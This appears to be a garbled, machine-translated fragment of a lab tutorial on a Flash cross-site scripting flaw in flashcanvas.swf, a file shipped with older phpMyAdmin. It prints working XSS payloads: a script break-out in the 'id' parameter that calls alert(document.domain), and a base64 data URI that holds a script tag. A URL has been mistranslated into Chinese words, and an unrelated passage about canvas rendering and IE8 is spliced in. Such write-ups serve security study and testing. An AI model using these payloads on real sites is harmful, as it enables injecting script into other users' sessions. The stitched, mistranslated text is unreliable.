XSS 7 - Flash XSS Flashcanvas.swf Flash XSS漏洞与标准反映的XSS不一样。他们需要更多的步骤才能找到正确的开发方式。 旧版本的PHPMyAdmin附带一个名为flashcanvas.swf的Flash文件,这个文件容易受到XSS的攻击。 打开flashcanvas.swf后,可以通过查找关键字“loaderInfo.parameters。”轻松查找由用户控制的参数。在这种情况下,我们找到了参数“id”。 像通常为一些Flash XSS所做的那样捕获错误:http:// TEST_VM:81 / vulnerable / externalinterface / phpmyadmin / js / canvg / flashcanvas.swf HTTP:// TEST_VM:81 /脆弱/ ExternalInterface的/ phpmyadmin的/ JS / canvg / flashcanvas.swf ID = 12345678 \
对于跨域的情况需要使用代理服务器(API 中有参数可以指定),对于 image 也同样; frame 内的 DOM 树无法被准确绘制; 因为要绘制的是 canvas 图,所以像 IE8 这样的浏览器需要使用 FlashCanvas
currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf? id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?